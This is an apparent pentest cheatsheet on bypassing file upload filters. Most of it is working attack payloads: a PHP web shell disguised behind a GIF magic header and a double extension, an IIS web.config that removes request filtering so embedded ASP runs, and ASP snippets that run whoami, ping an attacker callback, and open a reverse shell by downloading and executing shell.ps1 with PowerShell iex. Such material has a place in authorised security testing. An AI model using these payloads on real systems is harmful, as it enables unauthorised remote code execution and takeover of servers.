Business Logic Testing

File Upload

Cheatsheet

Bypassing Filters

Enumerate Allowed Extensions:

Truncating File-Name

Append Allowed Extension

  • file.php.png

GIF [MAGIC]

  • Check allowed file size

  • Check allowed extensions

  • Check Content-Type Header

Content-Disposition: form-data; name="myFile"; filename="test.php.png"

Content-Type: image/png



GIF87a                                                                                                                                                                         

<?php system($_GET['cmd']); ?>

IIS Web Servers

A web.config file lets you customize the way your site or a specific directory on your site behaves. For example, if you place a web.config file in your root directory, it will affect your entire site. If you place it in a /content directory, it will only affect that directory.

  • Upload ASP code within a web.config file.

  • Ensure each line of the ASP payload code is on a new line.

#Save as Web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<%
<!-- Insert ASPX Code Here -->
%>
#Payload to test for code execution. This will output sum(1+2)
<%
Response.write(1+2)
%>

#Test for whoami
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>

#Payload to test for ping callback
<% 
Set rs = CreateObject("WScript.Shell") 
Set cmd = rs.Exec("cmd /c ping 10.10.14.4") 
o = cmd.StdOut.Readall() 
Response.write(o) 
%>

tcpdump -i tun0 icmp

#Reverse shell
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('<IP>/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>

Last updated